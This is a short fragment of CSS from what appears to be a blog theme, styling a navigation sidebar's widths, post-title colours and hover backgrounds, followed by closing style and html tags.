    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
